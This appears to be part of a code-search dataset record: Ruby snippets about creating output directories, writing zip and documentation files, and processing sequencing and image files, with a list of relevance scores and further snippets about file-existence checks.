"def write_images\n # Enumerate all the files in the zip and write any that are in the media directory to the output buffer (which is used to generate the new zip file)\n @file.read_files do |entry| # entry is a file entry in the zip\n if entry.name.include? IMAGE_DIR_NAME\n # Check if this is an image being replaced\n current_image = @images.select { |image| !@relationship_manager.get_relationship(image.id).nil? and entry.name.include? @relationship_manager.get_relationship(image.id)[:target] }.first\n\n unless current_image.nil?\n replacement_path = current_image.path\n data = ::File.read(replacement_path)\n else\n entry.get_input_stream { |is| data = is.sysread }\n end\n\n @file.output_stream.put_next_entry(entry.name)\n @file.output_stream.write data\n end\n end\n\n # Create any new images\n @unique_image_paths = []\n @images.select { |image| image.is_new }.each do |new_image|\n next if @unique_image_paths.include? new_image.target # we only want to write each image once\n @unique_image_paths << new_image.target\n @file.output_stream.put_next_entry(\"word/#{new_image.target}\")\n @file.output_stream.write ::File.read(new_image.path)\n end\n end",
"def setup()\n create_directories\n end",
"def new_files; end",
"def create_output_directories\n return unless @option_output_path\n subdirectory = \"#{@option_output_path}/nodes\"\n return @option_output_path if File.directory?(@option_output_path) && File.directory?(subdirectory)\n Dir.mkdir(@option_output_path)\n output_path_error_and_exit(@option_output_path) unless File.directory?(@option_output_path)\n Dir.mkdir(subdirectory)\n output_path_error_and_exit(subdirectory) unless File.directory?(subdirectory)\n @option_output_path\n end",
"def run_it\n run_through_directory\n file_array_parser\n remove_initial_and_format_change\n array_to_hash\n final_name_info\n create_goal_file\nend",
"def setup_output_dir(dir, force)\n flag_file = output_flag_file dir\n\n last = {}\n\n if @options.dry_run then\n # do nothing\n elsif File.exist? dir then\n error \"#{dir} exists and is not a directory\" unless File.directory? dir\n\n begin\n File.open flag_file do |io|\n unless force then\n Time.parse io.gets\n\n io.each do |line|\n file, time = line.split \"\\t\", 2\n time = Time.parse(time) rescue next\n last[file] = time\n end\n end\n end\n rescue SystemCallError, TypeError\n error <<-ERROR\n\nDirectory #{dir} already exists, but it looks like it isn't an RDoc directory.\n\nBecause RDoc doesn't want to risk destroying any of your existing files,\nyou'll need to specify a different output directory name (using the --op <dir>\noption)\n\n ERROR\n end unless @options.force_output\n else\n FileUtils.mkdir_p dir\n FileUtils.touch flag_file\n end\n\n last\n end",
"def filenames; end",
"def distribute\n output_dir(@spec.meta, @meta_dir)\n output_dir(@spec.path, @path_dir)\n output_dir(@spec.model, @model_dir)\n true\n end",
"def generate_file_files\n setup\n\n page_file = @template_dir + 'page.rhtml'\n fileinfo_file = @template_dir + 'fileinfo.rhtml'\n\n # for legacy templates\n filepage_file = @template_dir + 'filepage.rhtml' unless\n page_file.exist? or fileinfo_file.exist?\n\n return unless\n page_file.exist? or fileinfo_file.exist? or filepage_file.exist?\n\n debug_msg \"Generating file documentation in #{@outputdir}\"\n\n out_file = nil\n current = nil\n\n @files.each do |file|\n current = file\n\n if file.text? and page_file.exist? then\n generate_page file\n next\n end\n\n template_file = nil\n out_file = @outputdir + file.path\n debug_msg \" working on %s (%s)\" % [file.full_name, out_file]\n rel_prefix = @outputdir.relative_path_from out_file.dirname\n search_index_rel_prefix = rel_prefix\n search_index_rel_prefix += @asset_rel_path if @file_output\n\n asset_rel_prefix = rel_prefix + @asset_rel_path\n\n unless filepage_file then\n if file.text? then\n next unless page_file.exist?\n template_file = page_file\n @title = file.page_name\n else\n next unless fileinfo_file.exist?\n template_file = fileinfo_file\n @title = \"File: #{file.base_name}\"\n end\n end\n\n @title += \" - #{@options.title}\"\n template_file ||= filepage_file\n\n render_template template_file, out_file do |io|\n here = binding\n # suppress 1.9.3 warning\n here.local_variable_set(:asset_rel_prefix, asset_rel_prefix)\n here.local_variable_set(:current, current)\n here\n end\n end\n rescue => e\n error =\n RDoc::Error.new \"error generating #{out_file}: #{e.message} (#{e.class})\"\n error.set_backtrace e.backtrace\n\n raise error\n end",
"def create_output_directory\n FileUtils.mkdir_p @output_dir\n end",
"def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end",
"def write()\n entries = Dir.entries(@inputDir); entries.delete(\".\"); entries.delete(\"..\"); entries.delete(\"yamproject.json\"); entries.delete(\".DS_Store\")\n io = Zip::File.open(@outputFile, Zip::File::CREATE);\n writeEntries(entries, \"\", io)\n io.close();\n end",
"def create_own_results_file(filename,output)\n # Create a blank file and put the output in\n self.create_file(\"#{filename}\", output)\n end",
"def prepare_target_dir\n begin\n FileUtils.mkdir(@output_dir)\n copy_default_files\n rescue Errno::EEXIST\n puts \"-- #{output_dir} already exists -- canceling initialization. \"\n return\n end\n end",
"def add_default_files_to_definition\n mkdir_p('files')\n default_files = File.join(File.dirname(__FILE__), '../../files')\n files = []\n chdir(default_files) do\n files += Dir.glob(\"**/*\")\n end\n files.each do |filespec|\n dest = File.join('files', filespec)\n unless File.exist?(dest)\n src = File.join(default_files, filespec)\n if File.file?(src)\n destdir = File.dirname(dest)\n mkdir_p(destdir) unless File.exist?(destdir)\n # puts \"cp(#{src}, #{dest}), destdir => #{destdir}\"\n cp(src, dest)\n end\n end\n end\n end",
"def post_process(file)\n if File.basename(file.to_s).match(/library/)\n oldfile = file\n file = file.to_s.sub(\"library\", @options[:lib_name_u])\n FileUtils.mv(oldfile, file)\n end\n if File.dirname(file.to_s).split(\"/\").last == \"library\"\n origdir = File.dirname(file.to_s)\n dirarr = origdir.split(\"/\")\n dirarr[dirarr.size-1] = @options[:lib_name_u]\n new_dir = File.join(dirarr)\n mkdir(new_dir)\n oldfile = file\n file = File.join(new_dir, File.basename(file))\n FileUtils.mv(oldfile, file)\n FileUtils.rmdir(origdir)\n end\n if file.to_s.match(/\\.seed$/)\n out_file = Pathname.new(file.to_s.sub(/\\.seed$/, ''))\n # Don't overwrite a file of the same name, unless they --force\n if copy_check(out_file)\n template = ::ERB.new(File.read(file))\n # This binding has access to any instance variables of\n # the ProjectCreator instance\n result = template.result(binding)\n File.open(file.to_s.sub(/\\.seed$/,''), 'w+') do |io|\n io.puts result\n end\n end\n # Remove the seed file whether we copied or not\n FileUtils.rm_f(file)\n end\n end",
"def create_initialize_files\n\n #todo 扩展根目录,注意后期同样要添加参数配置\n empty_directory 'modules' unless Dir.exist?('modules')\n\n\n empty_directory \"#{module_path}\"\n empty_directory \"#{module_path}/app\"\n empty_directory \"#{module_path}/app/controllers\"\n empty_directory \"#{module_path}/app/helpers\"\n empty_directory \"#{module_path}/app/models\"\n empty_directory \"#{module_path}/app/views\"\n empty_directory \"#{module_path}/config\"\n empty_directory \"#{module_path}/config/initializers\"\n empty_directory \"#{module_path}/config/locales\"\n empty_directory \"#{module_path}/db\"\n empty_directory \"#{module_path}/db/migrate\"\n empty_directory \"#{module_path}/lib\"\n empty_directory \"#{module_path}/lib/menus\"\n\n\n copy_file 'init_.rb', \"#{module_path}/initializers/init_#{module_name}.rb\" # 启用各模块必须的文件\n copy_file 'routes.rb', \"#{module_path}/config/routes.rb\" # 路由文件\n copy_file 'en.yml', \"#{module_path}/config/locales/en.yml\" # en多语言文件\n copy_file 'zh.yml', \"#{module_path}/config/locales/zh.yml\" # zh多语言文件\n copy_file 'init_data.rb', \"#{module_path}/lib/menus/init_data.rb\" # 配置文件,比如:菜单、功能、权限(action)等\n\n\n end",
"def do_not_overwrite!\n @overwrite = false\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def create_cache_files\n @cache_path_names = {}\n each_file_set(:create_cache_file)\n write_cache_path_file\n end",
"def keep_files; end",
"def generate\n files = Dir.glob \"#{Settings[:direcotry]}#{Settings[:mask]}\"\n files.each do |f|\n if (!File.directory?(f) && !File.symlink?(f))\n puts \"processing #{f}\"\n begin \n i = Image.new f\n # this will skip anything that imagemagick doesn't like, GIGO\n rescue MiniMagick::Invalid\n puts \"#{f} is not an image, skipping\"\n next\n end\n\n if @list[i.md5]\n @list[i.md5].filename.push f\n else\n @list[i.md5] = i\n end\n end\n end\n end",
"def reset\n @file_extensions = []\n @file_patterns = []\n @check_patterns = []\n end",
"def prepareForFile(filename)\n end",
"def setup_run_artifacts\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_logs\")\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_report\")\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_results\")\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_screenshots\") unless File.exist?(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_screenshots\")\nend",
"def initialize(name, metadata = {})\n super\n @files = {}\n end",
"def files=(_arg0); end",
"def create_image_files_where_needed()\n @file_info.data.each do |line|\n uri, filename = line\n process_file_info(uri, filename)\n end\n end",
"def output_path; end",
"def create_files\n tests.each do |test|\n FileUtils.mkdir(test.id.to_s) unless Dir.exist?(test.id.to_s) if test.option[:dir]\n files = []\n files << test.action.split('?').first\n files += test.option[:implicit]\n files << test.result_rdf if test.result_rdf\n files << test.result_json if test.result_json\n files.compact.select {|f| !File.exist?(f)}.each do |f|\n File.open(f, \"w\") {|io| io.puts( f.end_with?('.json') ? \"{}\" : \"\")}\n end\n end\n end",
"def overwrite!\n @overwrite = true\n end",
"def clean_output\n @jobs.each do |job|\n logfile = Pathname.new(\"#{job.pattern.dirname}/#{job.pattern.basename.to_s.chomp(job.pattern.extname)}.log\")\n logfile.cleanpath\n if logfile.file?\n # puts \"Deleting log file #{logfile}\"\n logfile.delete\n end\n end\n end",
"def initialize input_files\n @input_files = input_files\n @input_data = Hash.new\n @output_data = Array.new\n end",
"def ensure_files!\n fatal! \"Cannot read from #{@stdin}\" unless File.readable? @stdin\n [@stdout, @stderr].each do |f|\n dir = File.dirname(f)\n safely do\n FileUtils.mkdir_p(dir) unless File.directory?(dir)\n open(f, 'w') {} unless File.exists?(f)\n end\n next if File.writable? f\n fatal! \"Cannot write to #{f}\"\n end\n end",
"def create_files\n tests.each do |test|\n files = [test.action, test.urgna2012, test.urdna2015].compact\n files.compact.select {|f| !File.exist?(f)}.each do |f|\n File.open(f, \"w\") {|io| io.puts( f.end_with?('.json') ? \"{}\" : \"\")}\n end\n end\n end",
"def generate_objects(output_folder, types, version_name)\n version = @api.version_obj_or_default(version_name)\n @api.set_properties_based_on_version(version)\n (@api.objects || []).each do |object|\n if !types.empty? && !types.include?(object.name)\n Google::LOGGER.info \"Excluding #{object.name} per user request\"\n elsif types.empty? && object.exclude\n Google::LOGGER.info \"Excluding #{object.name} per API catalog\"\n elsif types.empty? && object.exclude_if_not_in_version(version)\n Google::LOGGER.info \"Excluding #{object.name} per API version\"\n else\n # version_name will differ from version.name if the resource is being\n # generated at its default version instead of the one that was passed\n # in to the compiler. Terraform needs to know which version was passed\n # in so it can name its output directories correctly.\n generate_object object, output_folder, version_name\n end\n end\n end",
"def initialize(data_location = DATA_LOCATION)\n @data_location = data_location\n @files = unprocessed_files\n @file_count = @files.length\n @archive_location = data_location + ARCHIVE_LOCATION\n FileUtils.mkdir_p @archive_location\n end",
"def generate_fastq\n\n # Generate FASTQ file list, expanding patterns if found.\n fastq_input_file_list = []\n fastq_output_prefix_list = []\n fastq_output_group_list = []\n ARGV.each do |fastq_input_file|\n if fastq_input_file =~ /[\\+\\?\\*]/\n # File is regexp: use it to do our own \"glob\".\n # If the regexp has at least one group in it, save the group match\n # in a corresponding list to use in making the output files.\n fastq_input_dir = File.dirname(fastq_input_file)\n fastq_input_patt = File.basename(fastq_input_file)\n\n Dir.entries(fastq_input_dir).sort().each do |entry|\n if entry =~ /#{fastq_input_patt}()/o\n fastq_input_file_list << entry\n if not @out_prefix.nil?\n fastq_output_prefix_list << @out_prefix\n else\n fastq_output_prefix_list << entry[0..Regexp.last_match.begin(1)-1-1] # Second -1 is for underline.\n end\n fastq_output_group_list << $1\n end\n end\n else\n if File.file? fastq_input_file\n fastq_input_file_list << fastq_input_file\n fastq_output_prefix_list << @out_prefix\n end\n end\n end\n\n die \"no FASTQ files found\" if fastq_input_file_list.length == 0\n\n STDERR.puts(\"Input files: #{fastq_input_file_list}\") if @verbose\n\n fastq_list = fastq_input_file_list.zip(fastq_output_prefix_list, fastq_output_group_list)\n fastq_list.each do |fastq_input_file, fastq_output_prefix, fastq_output_group|\n\n # If we are splitting to subfiles, reset the output sub filenames to\n # the new destination for the new input file; also reset statistics.\n if @save_subfiles\n if fastq_output_group == \"\"\n fastq_output_group_mod = fastq_output_group\n else\n fastq_output_group_mod = \"_#{fastq_output_group}\"\n end\n @pass_sub_filename = File.join(@pass_dir, \"#{fastq_output_prefix}_pf#{fastq_output_group_mod}.fastq\")\n @pass_sub_filename += \".gz\" if @compress\n @reject_sub_filename = File.join(@reject_dir, \"#{fastq_output_prefix}_reject#{fastq_output_group_mod}.fastq\")\n @reject_sub_filename += \".gz\" if @compress\n\n @stats_sub_filename = File.join(@stats_dir, \"#{fastq_output_prefix}_seq_stats#{fastq_output_group_mod}.txt\")\n @pass_sub_read_cnt = @reject_sub_read_cnt = @total_sub_read_cnt = 0\n end\n\n if @save_subfiles\n open_fastq_sub_output_files\n end\n\n # split one FASTQ file into post-filter and reject FASTQ\n STDERR.puts \"Processing #{fastq_input_file}...\" if @verbose\n fastq_input_fp = open_fastq_input(fastq_input_file)\n if fastq_input_fp.nil?\n warn \"#{fastq_input_file} is empty...skipping\"\n next\n end\n begin\n while fastq_input_fp.readline\n header_line = $_\n if header_line !~ /^@/\n STDERR.puts \"Missing header line (#{header_line})...exiting\"\n exit(-1)\n end\n\n header_fields = header_line.split(/[ _]/)\n die \"header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\"!\")}]\" if header_fields.size != 2\n\n sub_header_fields = header_fields[1].split(\":\",-1)\n die \"sub header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\":\")}(#{sub_header_fields.join(\":\")})]\" if sub_header_fields.size != 4\n\n @total_read_cnt += 1\n @total_sub_read_cnt += 1\n\n if sub_header_fields[1] == \"N\"\n out = @pass\n @pass_read_cnt += 1\n out_sub = @pass_sub\n @pass_sub_read_cnt += 1\n elsif sub_header_fields[1] == \"Y\"\n out = @reject\n @reject_read_cnt += 1\n out_sub = @reject_sub\n @reject_sub_read_cnt += 1\n else\n die \"filter field value error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER}...skipping read\"\n out = nil\n end\n\n # Read the rest of the sequence.\n seq_line = 
fastq_input_fp.readline\n plus_line = fastq_input_fp.readline\n if plus_line !~ /^\\+/\n STDERR.puts \"Malformed FASTQ +line (#{plus_line})\"\n end\n qual_line = fastq_input_fp.readline\n\n # Output the sequence to whatever file was chosen above.\n if !out.nil?\n if not @remove_spaces\n out.print \"#{header_line}\"\n out_sub.print \"#{header_line}\" if not out_sub.nil?\n else\n out.puts header_fields.join(\"_\")\n out_sub.puts header_fields.join(\"_\") if not out_sub.nil?\n end\n out.print \"#{seq_line}\"\n out.print \"#{plus_line}\"\n out.print \"#{qual_line}\"\n if not out_sub.nil?\n out_sub.print \"#{seq_line}\"\n out_sub.print \"#{plus_line}\"\n out_sub.print \"#{qual_line}\"\n end\n end\n end # while\n\n rescue EOFError\n\n end\n\n fastq_input_fp.close()\n\n if @save_subfiles\n close_fastq_sub_output_files\n store_stats @stats_sub_filename, @pass_sub_read_cnt, @reject_sub_read_cnt, @total_sub_read_cnt\n end\n\n end # fastq_list.each\n end",
"def install_images(object)\n generated_name = Storage.generated_file_name(object)\n install_main_image(object.has_image_id, generated_name)\n generate_thumbnails(object.has_image_id, generated_name) if thumbnails_needed?\n return generated_name\n ensure \n @temp_file.close! if !@temp_file.closed?\n @temp_file = nil\n end",
"def generate()\n objects = []\n\n # generate object file tasks\n files.each do |fname|\n output_file = File.join(@build_dir, File.basename(fname).ext('o'))\n objects.push output_file\n file output_file => [ fname ] do\n get_toolchain().compile( fname, output_file )\n end\n end\n\n # Link object files\n file output_file() => objects do\n get_toolchain().link( objects, output_file() )\n end\n\n # Create top level task\n desc \"Build the #{@name} application\"\n task @name => [ output_file() ]\n end",
"def output\n super(@file_format => @file_path)\n end",
"def write_out\n @all_content.each do |venue_id, venue_content|\n manifest_dir = \"#{@base.deploy_path}\" / \"#{venue_content.sha1_digest}\"\n venue_dir = \"#{@base.deploy_path}\" / \"#{Venue.get!(venue_id).router.identifier}\"\n manifest_file = manifest_dir / \"manifest.json\"\n files_dir = manifest_dir / \"files\"\n venue_content_ln = \"#{venue_dir}\" / \"content\"\n sha1_file = manifest_dir / \"#{venue_content.sha1_digest}.sha1\"\n \n FileUtils.rm(venue_content_ln) if File.exists?(venue_content_ln)\n FileUtils.mkdir_p(venue_dir)\n if File.exists?(sha1_file)\n FileUtils.ln_sf(manifest_dir, venue_content_ln)\n next\n end\n\n FileUtils.mkdir_p(manifest_dir)\n\n open(manifest_file, \"w+\") do |f|\n f << venue_content.manifest.to_json\n end\n\n #FileUtils.mkdir_p(files_dir)\n source_files = venue_content.filelist\n venue_content.filelist.each do |f|\n #UploadManager is using the first 2 bytes of the file digest as directory names.\n #The split('/'[-3..-1].join('') restores the filename to the full digest when it is copied\n #from the upload dir to the deployment dir\n dest = \"#{manifest_dir}\" / \"#{f.split('/')[-3..-1].join('')}\"\n FileUtils.cp(f, dest)\n end\n \n open(sha1_file, \"w+\") do |f|\n f << venue_content.sha1_digest\n end\n \n FileUtils.ln_sf(manifest_dir, venue_content_ln)\n end\n end",
"def check_overwrite(list)\n return if force?\n return if prompt?\n return if skip?\n #return if session.overwrite? # TODO: not so sure overwirte? option is a good idea.\n\n if newproject? && !output.glob('**/*').empty? # FIXME?\n abort \"New project isn't empty. Use --force, --skip or --prompt.\"\n end\n\n clobbers = []\n list.each do |action, loc, tname, fname, opts|\n tpath = loc + tname\n fpath = output + fname\n if fpath.file? #fpath.exist?\n clobbers << relative_to_output(fname)\n end\n end\n\n if !clobbers.empty?\n puts \" \" + clobbers.join(\"\\n \")\n abort \"These files would be overwritten. Use --force, --skip or --prompt.\" # TODO: implement --skip\n end\n end",
"def initialize\n @output = VersionedFiles.format_options['output']\n @fm_mods = VersionedFiles.frontmatter\n end",
"def create_definition_files(folder)\n return unless File.directory? folder\n hash = Hash.new { |h, k| h[k] = [] }\n Dir.glob(\"#{definitions_dir}/**/*.json\").map do |f|\n filename = File.basename(f, '.*').to_s\n hash[filename] << [name: '', file: '']\n end\n save 'models', hash\n end",
"def check_overwrite(list)\n return if write?\n return if prompt?\n return if skip?\n #if newproject? && !output.glob('**/*').empty? # FIXME?\n # abort \"New project isn't empty. Use --force, --skip or --prompt.\"\n #end\n clobbers = []\n list.each do |action, fname|\n tpath = source + fname\n fpath = output + fname\n if fpath.file? #fpath.exist?\n clobbers << fname\n end\n end\n # TODO: implement --skip\n if !clobbers.empty?\n puts \" \" + clobbers.join(\"\\n \")\n raise \"These files would be overwritten. Use --write, --skip or --prompt.\"\n end\n end",
"def file_utils=(_arg0); end",
"def build\n entries = Dir.entries(@input_dir)\n entries.delete_if {|e| @exclude.include?(e)}\n FileUtils.rm_f(@output_file) # Make sure file doesn't exist\n ::Zip::File.open(@output_file, ::Zip::File::CREATE) do |zipfile|\n write_entries entries, '', zipfile\n end\n end",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def initialize(output_path = \".\")\n @path = output_path\n end",
"def initialize(options={})\n @photos = []\n @config = config(options)\n FileUtils.mkdir_p(config['reprint'])\n end",
"def make_output_dir (src_path)\n delete_all_files(src_path) if directory_exists?(src_path) == true\n Dir.mkdir(src_path)\nend",
"def set_filename_from_parent\n components = parent.filename.split('.')\n if components.size > 1\n ext = components.last\n name = components[0, components.size - 1].join('.')\n else\n ext = 'mp3'\n name = parent.filename\n end\n name = Digest::SHA1.hexdigest(\"KroogiFileDownload-#{id}-#{name}\")\n \n self.filename = \"#{name}.#{ext}\"\n end",
"def make_directories!\n @sprites_path.mkpath unless @sprites_path.directory?\n @sources_path.mkpath unless @sources_path.directory?\n end",
"def build\n sync\n output_dir.mkpath\n outputs.each(&:build)\n output_dir.touch\n end"
] |
[
"0.6232518",
"0.6184175",
"0.6184175",
"0.59729785",
"0.59653115",
"0.59573036",
"0.5955682",
"0.586235",
"0.5650143",
"0.5644276",
"0.5609321",
"0.55744547",
"0.5573275",
"0.5573275",
"0.55628407",
"0.550828",
"0.5458454",
"0.5405517",
"0.5376202",
"0.5362049",
"0.5338774",
"0.5338214",
"0.5317791",
"0.53041327",
"0.5301997",
"0.5301922",
"0.5291922",
"0.52808154",
"0.5273526",
"0.5266365",
"0.5262107",
"0.52497506",
"0.52353555",
"0.52349466",
"0.5226617",
"0.52191395",
"0.5191527",
"0.5190976",
"0.5185621",
"0.51594037",
"0.5158201",
"0.5151235",
"0.5142169",
"0.51279235",
"0.511541",
"0.5114583",
"0.51105237",
"0.5109147",
"0.50936615",
"0.50881195",
"0.50842583",
"0.5082525",
"0.5079004",
"0.5078002",
"0.5063038",
"0.50601983",
"0.5045133",
"0.50429744",
"0.5015723",
"0.5012651",
"0.50091034",
"0.50055146",
"0.50017166",
"0.5001619",
"0.5001173",
"0.50010186",
"0.4991452",
"0.49808434",
"0.4970765",
"0.49681875",
"0.49572116",
"0.49527457",
"0.49497026",
"0.49455485",
"0.49416113",
"0.49396843",
"0.4936325",
"0.4932337",
"0.49310267",
"0.49176338",
"0.4914446",
"0.49134701",
"0.49108133",
"0.49065953",
"0.49046922",
"0.48981515",
"0.4896128",
"0.48911536",
"0.48870337",
"0.48861384",
"0.48790836",
"0.48749828",
"0.48740697",
"0.48740697",
"0.48685223",
"0.4866722",
"0.4864892",
"0.48636523",
"0.48628005",
"0.486031"
] |
0.5112694
|
46
|
Verbosely checks if a file should be processed. filename: file whose existence will be checked. step: name of the pipeline step.
|
def skip_step?(filename, step)
if File.exist?(filename) && !@force_overwrite
print_e "SKIPPED #{step}: #{filename} already exists."
true
else
print_e "RUN #{step} => #{filename}"
false
end
end
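A hedged usage sketch, mirroring a sibling step from the same pipeline (the @names registry and run_cmd helper are assumed from the surrounding class, not shown here): each step guards its output file with skip_step? before doing any work, so re-runs are idempotent unless force-overwrite is set.

def trim
  # Skip the whole step when the output file already exists and
  # force-overwrite is off; otherwise announce the run and execute.
  return if skip_step?(@names.get('trim'), 'trimming')
  run_cmd(
    'fastx_trimmer -Q33 -f 2' \
    " -i #{@names.get('clip')}" \
    " -o #{@names.get('trim')}"
  )
end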
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def file_fixture_exists?(filename, step = '')\n return true if File.exist?(Rails.root.join(UPLOADED_FILES_DIR, filename))\n\n raise \"ERROR in step: '#{step}'\\n\" +\n \" The file #{filename}\\n\" +\n \" must exist in #{UPLOADED_FILES_DIR}\\n\" +\n \" but it doesn't. Either correct the file name to a file that does exist in that directory\\n\" +\n \" or create a file and put it in that directory.\\n\"\nend",
"def file_verified?(filename)\n if !File.exists?(filename)\n notifier.test_file_missing(filename)\n puts \"=> ERROR: could not find test file: #{filename}\"\n return false\n end\n return true\n end",
"def test_file_exists?\n\t\tif @test_file_name.nil?\n\t\t\tputs \"No test data given to run. Exiting.\"\n\t\t\texit(0)\n\t\tend\n\tend",
"def test_file_missing(filename)\n end",
"def filename_present_only_if_job_successful\n if state == SUCCESS && filename.blank?\n errors.add :filename, \"can't be blank if the job state is SUCCESS\"\n elsif state != SUCCESS && filename.present?\n errors.add :filename, \"must be blank if the job state is different from SUCCESS\"\n end\n end",
"def validate_file_status(filename)\n raise IconGenerator::Error unless File.exists? filename\n end",
"def check\n prefix = File.basename(@file)\n if File.exist?(@file)\n @message = \"#{prefix} : Expected file exists\"\n true\n else\n @message = \"#{prefix} : Expected file not found.\"\n false\n end\n end",
"def file?\n original_filename.present?\n end",
"def check_for_file\n @ff.check_for_file \n end",
"def check_file\n super\n end",
"def check_file_existence (file_path)\n \"[ -f '#{file_path}' ]\"\n end",
"def checkfile()\n if not File.file?(@file)\n abort(\"File #{@file} does not exist. Aborting...\")\n end\n end",
"def file_exists?(node, file)\n _out, _local, _remote, code = node.test_and_store_results_together(\"test -f #{file}\", 'root', 500)\n code.zero?\nend",
"def file_exists?(node, file)\n _out, _local, _remote, code = node.test_and_store_results_together(\"test -f #{file}\", 'root', 500)\n code.zero?\nend",
"def generated_net_specflow_feature_file?\n name.downcase =~ /\\.feature\\.cs$/\n end",
"def validate_file(filename)\n return true\nend",
"def test_file\n\t\traise Store::Error, \"Error: file #{@file} does not exist\" unless is_up?\n\tend",
"def should_generate? config\n File.basename(source_file)[0] != '_'\n end",
"def start file_path\n\t\tfileExist? file_path\n\tend",
"def validate_file_input file, type\n @logger.debug \"Validating input file for #{type} file #{file}\"\n error = false\n unless file.is_a?(String) and !file.nil?\n error = \"The #{type} filename (#{file}) is not valid.\"\n else\n unless File.exists?(file)\n error = \"The #{type} file (#{file}) was not found.\"\n end\n end\n if error\n @logger.error \"Could not validate input file: #{error}\"\n raise \"InvalidInput\"\n end\nend",
"def filecheck\n file.nil? ? false : File.exist?(file)\n end",
"def check_file!(filename)\n unless ::File.exists?(filename)\n raise FileNotFound\n end\n end",
"def user_path?(file); end",
"def validate_file_is_t2flow\n if !@file_data.nil? && !get_details_from_model\n errors.add :workflow_file,\n \" \\\"\" + @file_data.original_filename +\n \"\\\" is not a valid taverna workflow file (t2flow)\"\n end\n end",
"def test_file?(path)\n @tests_files.include?(path)\n end",
"def autotile_exist?(filename)\n test_file_existence(filename, Autotiles_Path, @autotile_data)\n end",
